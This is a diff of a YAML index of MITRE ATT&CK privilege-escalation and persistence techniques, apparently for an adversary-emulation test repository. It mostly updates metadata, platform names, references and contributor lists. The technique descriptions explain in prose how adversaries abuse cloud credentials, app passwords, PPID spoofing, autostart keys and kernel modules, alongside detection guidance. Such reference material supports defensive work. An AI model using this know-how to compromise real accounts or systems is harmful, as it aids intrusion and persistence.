@@ -19289,8 +19594,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1546.009:
@@ -19322,7 +19625,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19370,13 +19673,11 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19389,16 +19690,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -19410,16 +19711,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -19474,7 +19775,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -19497,7 +19797,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19541,8 +19841,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1547.015:
@@ -19619,7 +19917,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -19647,8 +19945,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1134.001:
@@ -19707,23 +20003,22 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -19733,11 +20028,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -19748,12 +20047,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -19762,6 +20068,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19770,13 +20077,16 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -19802,10 +20112,18 @@ privilege-escalation:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -19814,10 +20132,20 @@ privilege-escalation:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19834,9 +20162,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1134.003:
@@ -19900,7 +20225,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -19989,7 +20313,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1134.004:
@@ -20047,7 +20370,7 @@ privilege-escalation:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -20072,12 +20395,11 @@ privilege-escalation:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -20103,7 +20425,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -20117,7 +20438,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -20144,8 +20464,8 @@ privilege-escalation:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -20156,7 +20476,8 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1055.014:
@@ -20227,7 +20548,7 @@ privilege-escalation:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20254,7 +20575,6 @@ privilege-escalation:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.014:
     technique:
@@ -20294,7 +20614,7 @@ privilege-escalation:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20314,12 +20634,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20373,11 +20692,10 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20464,9 +20782,9 @@ privilege-escalation:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -20479,12 +20797,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -20520,16 +20837,15 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -20570,7 +20886,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests:
     - name: Azure - adding user to Azure role in subscription
@@ -20732,138 +21047,137 @@ privilege-escalation:
         elevation_required: false
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
